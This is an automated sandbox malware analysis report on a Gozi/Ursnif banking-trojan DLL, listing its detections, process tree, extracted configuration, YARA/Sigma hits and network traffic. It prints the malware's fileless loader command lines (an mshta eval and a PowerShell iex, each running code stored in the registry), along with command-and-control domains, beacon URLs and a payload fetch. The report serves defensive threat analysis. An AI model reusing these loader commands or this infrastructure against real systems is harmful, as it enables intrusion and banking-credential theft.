Play interactive tour

Edit tour

Analysis Report 2200.dll

Overview

General Information

Sample Name:	2200.dll
Analysis ID:	352230
MD5:	e07d47927df912332bc84b3f98586091
SHA1:	b55a9ae7a9ccd44dd3516e557e295e3f1cce750e
SHA256:	cc849b895a0c8237f81ca3fe6395929713fb7b3f0a7744d3ddc3cb08f9f4351d
Tags:	dllgoziifsb
Most interesting Screenshot:

Detection

Gozi Ursnif

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Detected Gozi e-Banking trojan

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Sigma detected: Dot net compiler compiles file from suspicious location

Yara detected Ursnif

Allocates memory in foreign processes

Changes memory attributes in foreign processes to executable or writable

Compiles code for process injection (via .Net compiler)

Creates a thread in another existing process (thread injection)

Disables SPDY (HTTP compression, likely to perform web injects)

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Sigma detected: MSHTA Spawning Windows Shell

Suspicious powershell command line found

Writes or reads registry keys via WMI

Writes registry values via WMI

Writes to foreign memory regions

Compiles C# or VB.Net code

Contains capabilities to detect virtual machines

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

Contains functionality to launch a process as a different user

Contains functionality to query CPU information (cpuid)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file does not import any functions

Queries the installation date of Windows

Queries the volume information (name, serial number etc) of a device

Registers a DLL

Sample file is different than original file name gathered from version info

Searches for the Microsoft Outlook file path

Sigma detected: Suspicious Rundll32 Activity

Tries to load missing DLLs

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Startup

System is w10x64

loaddll32.exe (PID: 4816 cmdline: loaddll32.exe 'C:\Users\user\Desktop\2200.dll' MD5: 99D621E00EFC0B8F396F38D5555EB078)

regsvr32.exe (PID: 5032 cmdline: regsvr32.exe /s C:\Users\user\Desktop\2200.dll MD5: 426E7499F6A7346F0410DEAD0805586B)

control.exe (PID: 5152 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)

rundll32.exe (PID: 2848 cmdline: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h MD5: 73C519F050C20580F8A62C849D49215A)

cmd.exe (PID: 3496 cmdline: C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)

iexplore.exe (PID: 4344 cmdline: C:\Program Files\Internet Explorer\iexplore.exe MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)

iexplore.exe (PID: 6012 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4344 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

iexplore.exe (PID: 5220 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4344 CREDAT:82962 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

iexplore.exe (PID: 5484 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4344 CREDAT:17422 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

iexplore.exe (PID: 5612 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4344 CREDAT:17430 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

mshta.exe (PID: 5676 cmdline: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)

powershell.exe (PID: 3848 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)) MD5: 95000560239032BC68B4C2FDFCDEF913)

conhost.exe (PID: 6140 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

csc.exe (PID: 3912 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ljarxop3\ljarxop3.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)

cvtres.exe (PID: 5656 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESA74F.tmp' 'c:\Users\user\AppData\Local\Temp\ljarxop3\CSC1A4E6FF24B5843DD91B4B2D685136E16.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)

csc.exe (PID: 5896 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\huo1uow1\huo1uow1.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)

cvtres.exe (PID: 204 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESB5E5.tmp' 'c:\Users\user\AppData\Local\Temp\huo1uow1\CSCD4A633EEA14B4698A251A533E137966.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)

explorer.exe (PID: 3424 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)

RuntimeBroker.exe (PID: 3656 cmdline: MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)

cmd.exe (PID: 2204 cmdline: cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\A4AC.bi1' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 4560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Configuration

Threatname: Ursnif

{"server": "730", "os": "10.0_0_17134_x64", "version": "250171", "uptime": "363", "system": "d18bca24401b3a0555b04f62f946271ehh~", "size": "201282", "crc": "2", "action": "00000000", "id": "2200", "time": "1613090881", "user": "902d52678695dc15e71ab15cab4ca1f8", "hash": "0xcf6ed071", "soft": "3"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000001.00000003.778286799.0000000004EE8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000001.00000003.843211689.0000000000B50000.00000004.00000001.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000001.00000003.778174223.0000000004EE8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000001.00000003.778148472.0000000004EE8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000001.00000003.778122341.0000000004EE8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000001.00000003.778237278.0000000004EE8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
0000001A.00000003.862721568.0000016D9CE90000.00000004.00000001.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
0000001A.00000003.862721568.0000016D9CE90000.00000004.00000001.sdmp	GoziRule	Win32.Gozi	CCN-CERT	0x8f0:$: 63 00 6F 00 6F 00 6B 00 69 00 65 00 73 00 2E 00 73 00 71 00 6C 00 69 00 74 00 65 00 2D 00 6A 00 ...
00000010.00000003.837542203.000001895DE90000.00000004.00000001.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000010.00000003.837542203.000001895DE90000.00000004.00000001.sdmp	GoziRule	Win32.Gozi	CCN-CERT	0x8f0:$: 63 00 6F 00 6F 00 6B 00 69 00 65 00 73 00 2E 00 73 00 71 00 6C 00 69 00 74 00 65 00 2D 00 6A 00 ...
00000017.00000003.859361649.0000000002BB0000.00000004.00000001.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000017.00000003.859361649.0000000002BB0000.00000004.00000001.sdmp	GoziRule	Win32.Gozi	CCN-CERT	0x8f0:$: 63 00 6F 00 6F 00 6B 00 69 00 65 00 73 00 2E 00 73 00 71 00 6C 00 69 00 74 00 65 00 2D 00 6A 00 ...
00000018.00000002.863378164.000000000099E000.00000004.00000001.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000018.00000002.863378164.000000000099E000.00000004.00000001.sdmp	GoziRule	Win32.Gozi	CCN-CERT	0x8f0:$: 63 00 6F 00 6F 00 6B 00 69 00 65 00 73 00 2E 00 73 00 71 00 6C 00 69 00 74 00 65 00 2D 00 6A 00 ...
00000001.00000003.778275510.0000000004EE8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000001.00000003.785789013.0000000004D6B000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000018.00000003.850197611.000002A3D6AE0000.00000004.00000001.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000018.00000003.850197611.000002A3D6AE0000.00000004.00000001.sdmp	GoziRule	Win32.Gozi	CCN-CERT	0x8f0:$: 63 00 6F 00 6F 00 6B 00 69 00 65 00 73 00 2E 00 73 00 71 00 6C 00 69 00 74 00 65 00 2D 00 6A 00 ...
00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
0000001A.00000002.863933904.0000016D9D01E000.00000004.00000001.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
0000001A.00000002.863933904.0000016D9D01E000.00000004.00000001.sdmp	GoziRule	Win32.Gozi	CCN-CERT	0x8f0:$: 63 00 6F 00 6F 00 6B 00 69 00 65 00 73 00 2E 00 73 00 71 00 6C 00 69 00 74 00 65 00 2D 00 6A 00 ...
00000001.00000003.778197663.0000000004EE8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000001.00000003.778255655.0000000004EE8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: explorer.exe PID: 3424	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: regsvr32.exe PID: 5032	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: powershell.exe PID: 3848	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: control.exe PID: 5152	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: rundll32.exe PID: 2848	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Click to see the 23 entries

Sigma Overview

System Summary:

Sigma detected: Dot net compiler compiles file from suspicious location

Show sources

Source: Process started

Author: Joe Security: Data: Command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ljarxop3\ljarxop3.cmdline', CommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ljarxop3\ljarxop3.cmdline', CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3848, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ljarxop3\ljarxop3.cmdline', ProcessId: 3912

Sigma detected: MSHTA Spawning Windows Shell

Show sources

Source: Process started

Author: Michael Haag: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 5676, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), ProcessId: 3848

Sigma detected: Suspicious Rundll32 Activity

Show sources

Source: Process started

Author: juju4: Data: Command: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h, CommandLine: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h, CommandLine|base64offset|contains: , Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: C:\Windows\system32\control.exe -h, ParentImage: C:\Windows\System32\control.exe, ParentProcessId: 5152, ProcessCommandLine: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h, ProcessId: 2848

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: regsvr32.exe.5032.1.memstr

Malware Configuration Extractor: Ursnif {"server": "730", "os": "10.0_0_17134_x64", "version": "250171", "uptime": "363", "system": "d18bca24401b3a0555b04f62f946271ehh~", "size": "201282", "crc": "2", "action": "00000000", "id": "2200", "time": "1613090881", "user": "902d52678695dc15e71ab15cab4ca1f8", "hash": "0xcf6ed071", "soft": "3"}

Multi AV Scanner detection for domain / URL

Show sources

Source: c56.lepini.at	Virustotal: Detection: 8%			Perma Link
Source: api3.lepini.at	Virustotal: Detection: 10%			Perma Link

Multi AV Scanner detection for submitted file

Show sources

Source: 2200.dll	Virustotal: Detection: 16%			Perma Link
Source: 2200.dll	ReversingLabs: Detection: 39%

Compliance:

Uses 32bit PE files

Show sources

Source: 2200.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Uses new MSVCR Dlls

Show sources

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Jump to behavior

Uses secure TLS version for HTTPS connections

Show sources

Source: unknown	HTTPS traffic detected: 104.20.185.68:443 -> 192.168.2.4:49720 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.185.68:443 -> 192.168.2.4:49721 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 87.248.118.23:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 87.248.118.23:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49734 version: TLS 1.2

Binary contains paths to debug symbols

Show sources

Source:	Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 00000013.00000002.825653473.000001EE85550000.00000002.00000001.sdmp, csc.exe, 00000015.00000002.832839285.00000223F7150000.00000002.00000001.sdmp
Source:	Binary string: wscui.pdbUGP source: explorer.exe, 00000017.00000000.850334764.0000000005A00000.00000002.00000001.sdmp
Source:	Binary string: c:\housebar\Crosstown\WifeTalk\windowact\raceBank\Hunt.pdb source: 2200.dll
Source:	Binary string: ntdll.pdb source: regsvr32.exe, 00000001.00000003.849689543.0000000005790000.00000004.00000001.sdmp
Source:	Binary string: ntdll.pdbUGP source: regsvr32.exe, 00000001.00000003.849689543.0000000005790000.00000004.00000001.sdmp
Source:	Binary string: c:\housebar\Crosstown\WifeTalk\windowact\raceBank\Hunt.pdb@ source: 2200.dll
Source:	Binary string: rundll32.pdb source: control.exe, 00000018.00000002.880690061.000002A3D8A5C000.00000004.00000040.sdmp
Source:	Binary string: rundll32.pdbGCTL source: control.exe, 00000018.00000002.880690061.000002A3D8A5C000.00000004.00000040.sdmp
Source:	Binary string: wscui.pdb source: explorer.exe, 00000017.00000000.850334764.0000000005A00000.00000002.00000001.sdmp

Spreading:

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_001F7DD8 memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindNextFileA,StrChrA,memcpy,FindNextFileA,CompareFileTime,FindClose,HeapFree,HeapFree,	1_2_001F7DD8
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_00B1E0BA RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,	1_2_00B1E0BA
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_00B2888D lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,	1_2_00B2888D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_00B34FE1 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,	1_2_00B34FE1

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 1_2_00B205EF wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,

1_2_00B205EF

Networking:

Source: global traffic

HTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: c56.lepini.at

Source: Joe Sandbox View	IP Address: 104.20.185.68 104.20.185.68
Source: Joe Sandbox View	IP Address: 87.248.118.23 87.248.118.23

Source: Joe Sandbox View

ASN Name: GOOGLEUS GOOGLEUS

Source: Joe Sandbox View

JA3 fingerprint: 9e10692f1b7f78228b2d4e424db3a98c

Source: global traffic	HTTP traffic detected: GET /api1/lgORGW5qFn_2FL/FlQCK9WAHI3Hiwfkv_2Bd/YD_2BI2Xw2AGWng8/expfsroDYWZ8_2B/ZGfgnzwsY_2FSQ_2F3/a2GGZduez/SqOtvGRODR9NxK4_2F3R/2gP8hWIKAYYweque45c/mmo1QCYZVFeP5qFtRQW3rp/ESP8Dg0JYvi4a/zzwdg1Ba/kVPhJOlEUkXV9nZ6TtxGPu4/gqcL2pxbRo/OD4R3VuLXH9TB9ksT/J7YsghyQco_2/BonnsCX3QSq/e_2FlgvYSOP02Q/dsGMQxaYUUX012u0t5_2F/50UM82sSS5a5iW39/tnrjay9bJzCbz3PtHnh/d HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /api1/JQsoHKJSB/rNdVJ_2ByIK2QDFJR2qj/j2rw6DMd2f1e8eX8Ymg/9u0LouY1o0qnmocJ9nvfxr/XWjhEhDNEaQ_2/FYjjcA0h/eSTxi0np2M3GkDMJDUmRsAx/UvQhMAtYfw/bHvbHCpgIxEwn0SZp/LrrAt8U21M_2/BpEUbP2CORo/UW2pHsPHTDkzWu/mBoET9UfbltaF6qE6vcC1/04nY6eMBCYxT6Jao/ppmN_2FO5sKlIZe/z_2BFpIddjhGIg8u2_/2BrPbB1qq/eH44l_2FjBBiq9Kt9ByU/r3_2FcOIEGEvR4XQZpv/b5bozqpj7Ty6A4nci6CZa8/UAjk867qSAa/FjzX0u4 HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /api1/wPzY3TDew43rXgQ6h/jEuIuoewqqB_/2F8ty3dLaY0/g90J7yjpK4odzi/vJi7IcKUU7_2FxV8Z1qJI/_2Fs8Hy6ruNNXyd6/38pqG0u5LLQdPzP/ktNaKKuwlZigK_2Bvf/4YgNdy1LG/0Pu5bq_2FGp6HB5pNjiJ/RyL8GbL1FBB7I0W7eeW/LbvyRsvJlR2hT9EfEV7uAT/oI3vL_2BYGZE4/pytYFaia/wB_2BesnXvclSGag5xIl6QE/_2Fx_2FVgm/IkzdNmlB1x77eK_2F/ru0HED6qmv28/EwOp3VJsFvN/Oy6MX9770H20zV/NCGPJIvS0pQunXbVHlbjM/xQp8l5w_2BDk0RE85W/6 HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: c56.lepini.at
Source: global traffic	HTTP traffic detected: GET /api1/DuDF5ppGssBEcEr/QV9fVntnhIoMQikVLO/d6hiSYeOV/4dYFGDJikRkXzxb_2BwW/QFQQ_2FlxfAt2qA9o9g/62AD_2B2fmm2iqEcG6vEpj/wjoFULqIWzBtE/kxblvPrR/0YVugCmN_2Bc2j9hBYYHAx9/MHnpC4iz_2/F5oIRFMeoEacrx2cV/NDVPaDtLYLzj/tmzoxSzXTF9/V0uTtxgzD_2FHy/qFYc0FBl_2Bwgx5A9auDk/zR8Z_2FGrqOtQfFe/ortBJ2feUbdJvQH/rb6hSVK_2BoVNgF7mN/65jgIEhh3/dPvzgP_2ByDfnONu1bga/xxZ9XKj_2/B3 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0Host: api3.lepini.at
Source: global traffic	HTTP traffic detected: GET /api1/9tgtwLjb0tU0zx/gjkgUIt_2BDAbjs0GmiGf/jGKajlUv_2BCCAvj/GG7iDRArA8IwTDs/umyhHUUFxniPZSwiB1/Esmzl052W/VaAuas8dozcem21MrIfi/9YUq_2BOx3S4HJ73aAi/Vs0wStZxRwr04db1SG2ZhF/SDvfPYnIQuY21/wpQuP8zD/NKJ8gswNFYPlJUNd52s2mHl/F5u4SKY7Sb/kxNMhGHUlS6M7up7O/RKp4_2FZDHjQ/JbZOJmdSxil/58gaA96_2FkxAQ/MNrt1jQAMrd60eL4xAxxk/XtosXkxYrgp_2FaY/c1Ab0uIAwuv/A HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0Host: api3.lepini.at
Source: global traffic	HTTP traffic detected: GET /api1/4ZiHzRCntPm2_2Bs_/2FRsqW01GOmk/jlSxz1SigWt/9VO23wgzmt0z6v/oeSxd8UkQmb8DtzG6cPTd/ym_2By61IoxlQY3M/yETa3aFgtQZDw09/uFg9yjZYa11Lr07gXa/S4TdWO0jq/r61swA9KHU0n7D5WiS6M/aB0_2F0q98FaVumUgko/cxT6YBLiCeGe4HDHV0QwGa/JrNDDK39RFrqA/bnSciaqC/5xKVdu46G4ukxU_2BpjItQZ/vWdcVJKKZr/8uf5Z_2FSSRnkdJI6/EcvRjJAc0DIs/MbGP9aL3I1L/I1KoMe2FXtyIq_/2Fdget5Pj/NB HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0Host: api3.lepini.at

Source: de-ch[1].htm.4.dr	String found in binary or memory: <a href="https://www.facebook.com/" target="_blank" data-piitxt="facebooklite" piiurl="https://www.facebook.com/"> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000017.00000000.860537146.000000000FCE0000.00000004.00000001.sdmp	String found in binary or memory: :2021021220210213: user@https://www.msn.com/de-ch/?ocid=iehpMSN Schweiz \| Sign in Hotmail, Outlook Login, Windows Live, Office 365 equals www.hotmail.com (Hotmail)
Source: msapplication.xml0.3.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xa62b8c8d,0x01d700d8</date><accdate>0xa62b8c8d,0x01d700d8</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
